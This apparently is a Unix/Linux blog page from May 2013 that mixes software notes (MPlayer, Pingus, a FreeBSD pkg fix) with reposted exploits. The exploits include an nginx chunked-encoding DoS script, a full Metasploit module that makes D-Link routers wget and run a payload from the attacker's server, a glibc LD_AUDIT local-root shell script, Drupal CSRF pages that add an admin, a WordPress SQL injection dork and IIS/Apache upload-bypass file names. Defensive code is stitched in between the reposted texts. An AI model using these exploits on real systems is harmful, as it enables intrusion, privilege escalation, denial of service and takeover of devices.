MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

21 May 2013

Moxiecode Image Manager 3.1.5 Shell Upload

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is a commercial plugin for TinyMCE. It concerns both 
MCImageManager and all web applications which have MCImageManager in their 
bundle.
 
These are Arbitrary File Upload vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.
 
-------------------------
Affected products:
-------------------------
 
Moxiecode Image Manager 3.1.5 and previous versions are vulnerable.
 
-------------------------
Affected vendors:
-------------------------
 
Moxiecode
http://www.moxiecode.com
 
----------
Details:
----------
 
Arbitrary File Uploading (WASC-31):
 
http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html
 
Execution of arbitrary code is possible due to a bypass of the program's security 
filters (on IIS and Apache web servers).
 
Code will execute via file upload. The program is vulnerable to two methods 
of code execution:
 
1. Via use of the symbol ";" (1.asp;.txt) in the file name (IIS).
 
2. Via a double extension (1.php.txt) (Apache with special configuration).
 
MCImageManager has only two such holes, compared with three holes in 
MCFileManager (about which I wrote earlier). The attack via folder name was 
already not working in version 3.1.0.4. Both of these web applications have 
other vulnerabilities about which I'll write later.
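As an added defensive example (not part of the advisory and not MCImageManager's code), a server-side upload-name check that rejects both bypasses listed above: a ";" inside the name, which the advisory reports IIS executes as 1.asp, and a second extension such as .php.txt, which Apache with an AddHandler-style configuration can hand to the PHP handler. The extension allowlist and the stem character set are assumptions.

```python
"""Added example: a strict upload-name policy for an image upload handler.
Not part of the advisory or of MCImageManager; allowlist and limits are assumed."""
import os
import re
from typing import Optional

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}   # assumed: images only
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")      # assumed: conservative stem charset


def validate_upload_name(filename: str) -> Optional[str]:
    """Return the normalised name to store the upload under, or None to reject it.

    Rejects, among others, the two bypasses from the advisory:
      - '1.asp;.txt'  (IIS runs the part before ';' as 1.asp)
      - '1.php.txt'   (Apache with an AddHandler-style setup runs it as PHP)
    """
    # Strip any client-supplied directory part, Windows or POSIX style.
    base = os.path.basename(filename.replace("\\", "/"))
    # Characters that web servers or filesystems treat as delimiters.
    if any(ch in base for ch in (";", ":", "\x00")):
        return None
    parts = base.split(".")
    # Exactly one extension: 'stem.ext'. Two or more dots means a double
    # extension or a leading dot (e.g. .htaccess); both are rejected.
    if len(parts) != 2:
        return None
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS or not STEM_RE.match(stem):
        return None
    return f"{stem}.{ext}"
```

A name check alone is not the whole fix: uploads should also be stored under a directory where the web server has script execution disabled.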
 
------------
Timeline:
------------ 
 
2013.03.31 - briefly informed the developer (together with other issues related 
to TinyMCE).
2013.04.01 - informed the developer in detail.
2013.04.03 - announced at my site.
2013.04.04 - the developer planned to fix these holes in a new version in the 
coming days.
2013.05.18 - disclosed at my site (http://websecurity.com.ua/6416/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
21 May 2013

Nginx 1.3.9 / 1.4.0 Denial Of Service

# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
 
import httplib
import time
import socket
import sys
import os
 
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
 
packet = 0
 
def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked
 
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
        os.system("clear")
elif sys.platform == 'win32':
        os.system("cls")
else:
        os.system("cls")
 
print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028) [http://www.mertsarica.com]"
print "======================================================================"
 
if len(sys.argv) < 2:
        print "Usage: python nginx_dos.py [target ip]\n"
        print "Example: python nginx_dos.py 127.0.0.1\n"
        sys.exit(1)
else:
    host = sys.argv[1].lower()
 
while packet <= 5:
 
    body = "Mert SARICA"
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
 
    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
 
    try:
        con = httplib.HTTPConnection(host)
        url = "/mertsarica.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', "curl/7.30.0")
        con.putheader('Accept', "*/*")
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', "application/x-www-form-urlencoded")
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)
 
    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        print "[*] Knock knock, is anybody there ? (" + str(packet) + "/5)"
 
    packet = packet + 1
 
    con.close()
 
print "[+] Done!"
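The PoC above builds a 16-hex-digit chunk size. The added example below (mine, not the PoC author's) shows how such a value wraps a signed 64-bit accumulator of the form size = size * 16 + digit into a negative length, and beside it a bounded parser that refuses the digit before the overflow happens. The bound-before-multiply guard is a general pattern, not a quotation of the nginx patch.

```python
"""Added example (not from the PoC author): a 16-hex-digit chunk size wraps a
signed 64-bit accumulator negative; a bounded parser rejects it instead."""

INT64_MAX = (1 << 63) - 1


def wrap_int64(value: int) -> int:
    """Reduce an unbounded Python int to the signed 64-bit value C would hold."""
    return ((value + (1 << 63)) % (1 << 64)) - (1 << 63)


def parse_chunk_size_unchecked(hexdigits: str) -> int:
    """The classic accumulator loop, size = size * 16 + digit, in signed 64-bit.
    Sixteen hex digits with a high first digit overflow into a negative size."""
    size = 0
    for ch in hexdigits:
        size = wrap_int64(size * 16 + int(ch, 16))
    return size


def parse_chunk_size_checked(hexdigits: str) -> int:
    """Same loop, but refuse any digit that would push size past INT64_MAX.
    Leading zeros are harmless: size stays 0 until the first non-zero digit."""
    if not hexdigits:
        raise ValueError("empty chunk-size line")
    size = 0
    for ch in hexdigits:
        digit = int(ch, 16)   # raises ValueError on a non-hex character
        if size > INT64_MAX // 16:
            raise ValueError("chunk size overflows a signed 64-bit length")
        size = size * 16 + digit
    return size


def chunk_size_is_suspicious(hexdigits: str) -> bool:
    """Coarse proxy/log check: flag any chunk size a bounded parser rejects."""
    try:
        parse_chunk_size_checked(hexdigits)
    except ValueError:
        return True
    return False
```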
21 May 2013

D-Link DIR615h OS Command Injection

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR615h OS Command Injection',
      'Description' => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection on
        their web interface, where default credentials are admin/admin or admin/password.
        Since it is a blind os command injection vulnerability, there is no output for the
        executed command when using the cmd generic payload. This module was tested against
        a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
        controlled system could be used for testing purposes. The exploit uses the wget
        client from the device to convert the command injection into an arbitrary payload
        execution.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'BID', '57882' ],
          [ 'EDB', '24477' ],
          [ 'OSVDB', '90174' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ]
        ],
      'DisclosureDate' => 'Feb 07 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1,
      ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ], self.class)
  end
 
 
  def request(cmd)
    begin
      res = send_request_cgi({
        'uri'    => @uri,
        'method' => 'GET',
        'vars_get' => {
          "page" => "tools_vct",
          "hping" => "0",
          "ping_ipaddr" => "1.1.1.1`#{cmd}`",
          "ping6_ipaddr" => ""
        }
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end
 
  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    @uri = '/tools_vct.htm'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    @timeout = 5
 
    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res= send_request_cgi({
        'uri' => '/login.htm',
        'method' => 'POST',
        'vars_post' => {
          "page" => "login",
          "submitType" => "0",
          "identifier" => "",
          "sel_userid" => user,
          "userid" => "",
          "passwd" => pass,
          "captchapwd" => ""
        }
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end
 
    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false
 
    #
    # start our server
    #
    resource_uri = '/' + downfile
 
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
 
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end
 
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})
 
      datastore['SSL'] = true if ssl_restore
    end
 
    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)
 
    #not working if we send all command together -> lets take three requests
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown)"
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#(unknown)")
 
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#(unknown)"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
 
    #
    # execute
    #
    cmd = "/tmp/#(unknown)"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end
 
  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
 
    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
 
end
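The module's description says the injection sits in the ping_ipaddr field of the tools_vct page, where a backtick expression is passed to a shell. As an added example (not part of the Metasploit module or of D-Link firmware), the validation such a handler needs, building a ping argv from a strictly parsed address so no shell is involved, plus a check over access-log lines that flags ping_ipaddr values which are not bare IP addresses. The log lines are constructed in common-log style as if from a reverse proxy in front of the management UI; that setup and the function names are assumptions.

```python
"""Added example, not part of the Metasploit module: strict ping-target
validation and a log check for non-IP values in ping_ipaddr/ping6_ipaddr."""
import ipaddress
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit


def build_ping_argv(user_value: str, count: int = 3) -> Optional[List[str]]:
    """Return an argv list (no shell involved), or None if the value is not an IP.
    A value such as '1.1.1.1`id`' fails ipaddress parsing, so it never reaches a shell."""
    try:
        addr = ipaddress.ip_address(user_value.strip())
    except ValueError:
        return None
    tool = "ping6" if addr.version == 6 else "ping"
    return [tool, "-c", str(count), str(addr)]


_REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_ping_injection(log_lines: List[str]) -> List[str]:
    """Return request targets whose ping_ipaddr/ping6_ipaddr is not a plain IP."""
    flagged = []
    for line in log_lines:
        m = _REQ_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        bad = False
        for key in ("ping_ipaddr", "ping6_ipaddr"):
            for value in params.get(key, []):
                if value and build_ping_argv(value) is None:
                    bad = True
        if bad:
            flagged.append(target)
    return flagged


# Constructed sample lines: one legitimate ping, one carrying a backtick expression.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Feb/2013:10:00:00 +0000] "GET /tools_vct.htm?page=tools_vct'
    '&hping=0&ping_ipaddr=192.0.2.1&ping6_ipaddr= HTTP/1.1" 200 512',
    '192.0.2.10 - - [07/Feb/2013:10:00:05 +0000] "GET /tools_vct.htm?page=tools_vct'
    '&hping=0&ping_ipaddr=1.1.1.1%60id%60&ping6_ipaddr= HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in flag_ping_injection(SAMPLE_LOG):
        print("suspicious ping request:", hit)
```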
21 May 2013

Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root

#!/bin/sh
#
# [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit
#
# Edited by Todor Donev (todor dot donev at gmail dot com)
# This is another exploit for CVE-2010-3856
#
# Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov
# and Tsvetelina Emirska
#
# Another exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/sploit.so");
    setuid(0);
    setgid(0);
    setenv("HISTFILE", "/dev/null", 1);
    execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT="sploit.so" ping
21 May 2013

MPlayer 1.1.1 for Linux

MPlayer for Linux is a movie player which runs on many systems (see the documentation). It plays most MPEG/VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia, Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA files, supported by many native, XAnim, and Win32 DLL codecs. You can watch VideoCD, SVCD, DVD, 3ivx, DivX 3/4/5, WMV and even H.264 movies.

Another great feature of MPlayer is the wide range of supported output drivers. It works with X11, Xv, DGA, OpenGL, SVGAlib, fbdev, AAlib, DirectFB, but you can use GGI, SDL (and this way all their drivers), VESA (on every VESA compatible card, even without X11!) and some low level card-specific drivers (for Matrox, 3Dfx and ATI), too! Most of them support software or hardware scaling, so you can enjoy movies in fullscreen. MPlayer supports displaying through some hardware MPEG decoder boards, such as the Siemens DVB, DXR2 and DXR3/Hollywood+.

MPlayer has an onscreen display (OSD) for status information, nice big antialiased shaded subtitles and visual feedback for keyboard controls. European/ISO 8859-1,2 (Hungarian, English, Czech, etc), Cyrillic and Korean fonts are supported along with 12 subtitle formats (MicroDVD, SubRip, OGM, SubViewer, Sami, VPlayer, RT, SSA, AQTitle, JACOsub, PJS and our own: MPsub). DVD subtitles (SPU streams, VOBsub and Closed Captions) are supported as well.

Most time-critical parts are optimized for Intel/AMD (MMX/MMX2/SSE/SSE2/3DNow!/3DNowEx), PowerPC G4 (Altivec), SPARC (VIS), ARM PDAs and the Sony Playstation 2.

MPlayer comes with a GUI that is not built by default. The GUI section of the documentation explains how to enable it. Several external MPlayer frontends provide alternative GUIs.

Supported Input Formats: (S)VCD (Super Video CD), CDRwin's .bin image file, DVD, including encrypted DVD, MPEG-1/2 (ES/PS/PES/VOB), AVI file format, ASF/WMV/WMA format, QT/MOV/MP4 format, RealAudio/RealVideo format, Ogg/OGM files, Matroska, NUT, NSV (Nullsoft Streaming Video), VIVO format, FLI format, NuppelVideo format, yuv4mpeg format, FILM (.cpk) format, RoQ format, PVA format, streaming via HTTP/FTP, RTP/RTSP, MMS/MMST, MPST, SDP, TV grabbing,

Supported Video Codecs: MPEG-1 (VCD) and MPEG-2 (SVCD/DVD/DVB) video, MPEG-4 ASP in all variants including DivX ;-), OpenDivX (DivX4), DivX 5 (Pro), Xvid, MPEG-4 AVC aka H.264, Windows Media Video 7/8 (WMV1/2), Windows Media Video 9 (WMV3) (using x86 DLL), RealVideo 1.0, 2.0 (G2), RealVideo 3.0 (RP8), 4.0 (RP9) (using Real libraries), Sorenson v1/v3 (SVQ1/SVQ3), Cinepak, RPZA and other QuickTime codecs, DV video, 3ivx, Intel Indeo3 (3.1, 3.2), Intel Indeo 4.1 and 5.0 (using x86 DLL or XAnim codecs), VIVO 1.0, 2.0, I263 and other H.263(+) variants (using x86 DLL), MJPEG, AVID, VCR2, ASV2 and other hardware formats, FLI/FLC, HuffYUV, various old simple RLE-like formats

Supported Audio Codecs: MPEG layer 1, 2, and 3 (MP3) audio, AC3/A52, E-AC3, DTS (Dolby Digital) audio (software or SP/DIF), AAC (MPEG-4 audio), WMA (DivX Audio) v1, v2, WMA 9 (WMAv3), Voxware audio, ACELP.net etc (using x86 DLLs), RealAudio: COOK, SIPRO, ATRAC3 (using Real libraries), RealAudio: DNET and older codecs, QuickTime: Qclp, Q-Design QDMC/QDM2, MACE 3/6 (using QT libraries), ALAC, Ogg Vorbis audio, VIVO audio (g723, Vivo Siren) (using x86 DLL), alaw/ulaw, (ms)gsm, pcm, *adpcm and other simple old audio formats,

Source : http://pkgs.org/mplayer-for-linux/

21 May 2013

WordPress ProPlayer Plugin SQL Injection

##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
18 May 2013

Pingus 0.7.6 for Linux

Pingus for Linux is a free Lemmings(tm)-like puzzle game covered under the GNU GPL.
Pingus currently features 77 playable levels and runs under a wide variety of operating systems (Linux, Windows, MacOSX, etc.)

Pingus was started at the end of 1998 with the simple goal of creating a Free (as in freedom, not as in free beer) Lemmings(tm) clone.

Free means you get the sources and are allowed and encouraged to change and distribute them.
You basically get everything that I used to create this game. Over the years it has grown quite a bit beyond the original goal and become something more than just a clone: we have original artwork, a built-in level editor, new actions, multiplayer and a few other features.

Source : http://pkgs.org/pingus-for-linux/

18 May 2013

Drupal CMS 7.12 Multiple Vulnerabilities

# Exploit Title    : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date             : 02-03-2012
# Author           : Ivano Binetti (http://ivanobinetti.com)
# Software link    : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site      : http://drupal.org
# Version          : 7.12 (and lower)
# Tested on        : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID           : 18564 (http://www.exploit-db.com/exploits/18564/)  
# Other Advisory   : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory   : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerabilities Description
 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 2.3 Poor Session Checking (POST and GET method)
 2.4 Poor Session Checking (Http Referer)
3)Exploit
 3.1 Exploit (Add Administrator)
 3.2 Exploit (Force logout)
 
+---------------------------------------------------------------------------------------------------------------------------------------------------+
 
1)Introduction
Drupal "is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active
and diverse community of people around the world".
 
2)Vulnerability Description
Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface.
 
 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 Drupal, to secure changes made by administrators or users through the web management interface, uses a "form_token" parameter which is sent inside
 any HTTP POST request.
 There is a security flaw in the logic with which this parameter is generated, as the same parameter is used for similar operations
 (the same "form_id") in the same session (for example, for article creation Drupal assigns the same "form_token", for admin/user
 creation Drupal assigns the same "form_token", and so on).
 Another flaw is in the "form_build_id" parameter, which is used "to fetch state from a database table during certain operations". This parameter
 is generated differently for any operation an admin/user performs, but Drupal allows any other Drupal-generated "form_build_id" parameter
 (like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to be used to make changes to Drupal settings through the web management interface.
 So, even if Drupal creates a different "form_build_id" for every operation, you can use another "form_build_id" compatible with Drupal instead of the one
 generated by Drupal for that specific operation.
 These flaws can be used by an attacker who knows the values of the "form_build_id" and "form_token" parameters (for example an internal attacker
 performing a "Man in The Middle Attack", an external attacker that controls an internal client by a client-side exploit, an external attacker
 that directly controls a Drupal admin by a client-side exploit, and so on; there are many possibilities) to create an "ad-hoc" crafted web page
 in order to make any Drupal changes (add administrator, delete administrator, add web pages, delete web pages, ....) when a Drupal administrator
 or user browses that crafted web page.
 
 
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 There is another vulnerability - again related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows
 an attacker to create a crafted web page and force the logout of Drupal administrators/users from the web management interface. This vulnerability - forcing
 administrator logout - will aid an attacker in sniffing authentication credentials when a "Man in The Middle Attack" is performed.
 
 2.3 Poor Session Checking (POST and GET method)
 Drupal does not check the "GET" or "POST" HTTP method, allowing, even though a normal logout is made via an HTTP GET request, the above vulnerability
 to be exploited using the HTTP POST method.
 
 2.4 Poor Session Checking (Http Referer)
 Furthermore, Drupal does not perform "HTTP Referer" checking, allowing all the above described vulnerabilities to be exploited.
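 Sections 2.1 and 2.2 above describe a token that repeats per form_id within a session and a form_build_id that is interchangeable between forms. As an added example (mine, not Drupal's code or a description of how Drupal actually implements tokens), a form-token scheme in which the token is an HMAC bound to the session, the form_id and the one form_build_id minted at render time, so a token captured from one form, a build id issued for another form, or a replay of a consumed pair is rejected. The class and method names and the site secret are assumptions.

```python
"""Added example, not Drupal code: a per-render form token bound to
(session_id, form_id, form_build_id), with single-use build ids."""
import hashlib
import hmac
import secrets
from typing import Dict, Tuple


class FormTokenStore:
    def __init__(self, site_secret: bytes) -> None:
        self._secret = site_secret
        # form_build_id -> (session_id, form_id), recorded when the form is rendered
        self._builds: Dict[str, Tuple[str, str]] = {}

    def _token(self, session_id: str, form_id: str, build_id: str) -> str:
        # NUL separators keep "ab"+"c" and "a"+"bc" from colliding.
        msg = "\0".join((session_id, form_id, build_id)).encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def issue(self, session_id: str, form_id: str) -> Tuple[str, str]:
        """Render time: mint a fresh build id and the token bound to exactly it."""
        build_id = "form-" + secrets.token_urlsafe(32)
        self._builds[build_id] = (session_id, form_id)
        return build_id, self._token(session_id, form_id, build_id)

    def validate(self, session_id: str, form_id: str, build_id: str, token: str) -> bool:
        """Submit time: the build id must have been minted for this session and
        form_id, and the token must match that build id. A successful check
        consumes the build id so a captured pair cannot be replayed."""
        owner = self._builds.get(build_id)
        if owner != (session_id, form_id):
            return False          # unknown build id, or one issued for another form/session
        expected = self._token(session_id, form_id, build_id)
        if not hmac.compare_digest(expected, token):
            return False          # token belongs to a different render
        del self._builds[build_id]
        return True
```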
 
3)Exploit
 
 3.1 Exploit (Add Administrator)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit change user to admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
 <input type="hidden" name="name" value="new_admin"/>
 <input type="hidden" name="mail" value="new_admin@new_admin.com"/>
 <input type="hidden" name="pass[pass1]" value="new_password"/>
 <input type="hidden" name="pass[pass2]" value="new_password"/>
 <input type="hidden" name="status" value="1"/>
 <input type="hidden" name="roles[3]" value="3"/>
 <input type="hidden" name="timezone" value="Europe/Prague"/>
 <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
 <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
 <input type="hidden" name="form_id" value="user_register_form"/>
 <input type="hidden" name="op" value="Create new account"/>
 </form>
 </body>
 </html>
 
 
 3.2 Exploit (Force logout)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to logout Admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
 </form>
 </body>
 </html>
17 May 2013

FreeBSD : fixing the error "has a missing dependency"

If, after updating or installing various software, you encounter an error similar to this:

# pkg check -da

devel/gamin has a missing dependency: lang/perl5.12
devel/gio-fam-backend has a missing dependency: lang/perl5.12
irc/irssi has a missing dependency: lang/perl5.12
irc/irssi-scripts has a missing dependency: lang/perl5.12
mail/maildrop has a missing dependency: lang/perl5.12
misc/mc has a missing dependency: lang/perl5.12
mail/p5-Mail-SpamAssassin has a missing dependency: lang/perl5.12

Run the following command:

# pkg set -o lang/perl5.14:lang/perl5.12

Where "perl5.14" is the version currently installed on your system.

Source : http://lists.freebsd.org